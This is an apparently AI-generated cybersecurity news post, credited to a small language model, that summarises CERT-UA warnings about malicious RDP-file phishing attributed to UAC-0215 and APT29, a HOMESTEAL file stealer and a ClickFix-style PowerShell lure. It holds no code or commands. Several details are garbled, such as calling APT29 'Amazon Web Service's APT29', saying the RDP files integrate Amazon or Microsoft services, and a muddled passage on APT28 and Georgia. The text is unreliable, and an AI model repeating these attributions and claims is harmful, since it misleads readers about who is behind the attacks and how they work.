Today's cybersecurity headlines are brought to you by ThreatPerspective
Ethical Hacking News

CERT-UA Warns of Sophisticated Malicious RDP Files Targeting Ukrainian Entities



CERT-UA has issued a warning regarding a sophisticated malicious email campaign targeting Ukrainian entities, highlighting the importance of robust security controls in preventing data breaches and cyber attacks. The campaign, attributed to threat actor UAC-0215, utilizes Remote Desktop Protocol ('.rdp') configuration files as attachments, allegedly to integrate popular services such as Amazon or Microsoft.

  • A sophisticated malicious email campaign has been detected targeting Ukrainian government agencies, enterprises, and military entities.
  • The campaign uses Remote Desktop Protocol (.rdp) configuration files as attachments to gain remote access and steal data.
  • The attack is attributed to UAC-0215, a threat actor linked to Russian nation-state hacking group APT29 (also known as Amazon Web Service's APT29).
  • The campaign uses Visual Basic Script-based malware (HOMESTEAL) to exfiltrate files and an SSH tunnel to steal data from web browsers.
  • A ClickFix-style campaign is also detected, tricking users into malicious links that drop a PowerShell script capable of stealing data and downloading Metasploit.
  • Another Russian advanced persistent threat actor (APT28) is believed to be behind the cyber offensives against Ukraine.



    • CERT-UA has issued a warning regarding a sophisticated malicious email campaign targeting government agencies, enterprises, and military entities in Ukraine. The campaign, which began at least as far back as August 2024, utilizes Remote Desktop Protocol ('.rdp') configuration files as attachments, allegedly to integrate popular services such as Amazon or Microsoft, and implement a zero-trust architecture.

    However, once executed, the RDP files establish a connection with a remote server, enabling threat actors to gain remote access to compromised hosts, steal data, and plant additional malware for follow-on attacks. CERT-UA has attributed this campaign to a threat actor it tracks as UAC-0215, which Amazon Web Service (AWS) has linked to the Russian nation-state hacking group known as APT29.

    The malicious activity is believed to have been part of a larger-scale cyber attack aimed at stealing confidential information of Ukrainian users. The attack begins with a phishing email containing a link to a booby-trapped RAR archive that purports to be either bills or payment details. Present within the archive is a Visual Basic Script-based malware dubbed HOMESTEAL, designed to exfiltrate files matching certain extensions ("xls," "xlsx," "doc," "docx," "pdf," "txt," "csv," "rtf," "ods," "odt," "eml," "pst," "rar," and "zip") to an attacker-controlled server.

    Furthermore, CERT-UA has also warned of a ClickFix-style campaign that's designed to trick users into malicious links embedded in email messages to drop a PowerShell script capable of establishing an SSH tunnel, stealing data from web browsers, and downloading and launching the Metasploit penetration testing framework. Users who click the link are directed to a fake reCAPTCHA verification page prompting them to verify their identity by clicking on a button. This action copies the malicious PowerShell script ("Browser.ps1") to the user's clipboard and displays a popup window with instructions to execute it using the Run dialog box in Windows.

    In addition, CERT-UA has issued a warning regarding another Russian advanced persistent threat actor known as APT28 (aka UAC-0001), who is believed to be behind the cyber offensives against Ukraine. This report comes amidst a broader context of digital intrusions targeting Georgia's infrastructure and government between 2017 to 2020, with some attacks pinned on Turla.

    Amazon Web Service has also taken measures to neutralize the operation by seizing domains the adversary was using to impersonate AWS in order to disrupt their malicious activities. CERT-UA's alerts highlight the importance of vigilance against sophisticated phishing campaigns and the need for organizations to implement robust security controls to prevent data breaches and cyber attacks.

    In conclusion, this report highlights the evolving threat landscape in Ukraine, where attackers are utilizing increasingly sophisticated techniques to target government agencies, enterprises, and military entities. It serves as a reminder that cybersecurity is an ongoing process requiring constant monitoring and vigilance from organizations and individuals alike.



    Related Information:

  • https://thehackernews.com/2024/10/cert-ua-identifies-malicious-rdp-files.html

  • https://cybermaterial.com/rdp-files-exploit-used-to-target-ukraine/

  • https://en.wikipedia.org/wiki/Metasploit

  • https://www.varonis.com/blog/what-is-metasploit

  • https://www.bleepingcomputer.com/news/security/amazon-seizes-domains-used-in-rogue-remote-desktop-campaign-to-steal-data/

  • https://attack.mitre.org/groups/G0016/

  • https://cloud.google.com/blog/topics/threat-intelligence/tracking-apt29-phishing-campaigns

  • https://portswigger.net/daily-swig/who-is-behind-apt29-what-we-know-about-this-nation-state-cybercrime-group

  • https://www.crowdstrike.com/en-us/blog/who-is-fancy-bear/

  • https://attack.mitre.org/groups/G0007/


    • Published: Sat Oct 26 12:10:37 2024 by llama3.2 3B Q4_K_M


         


    © Ethical Hacking News . All rights reserved.

    Privacy | Terms of Use | Contact Us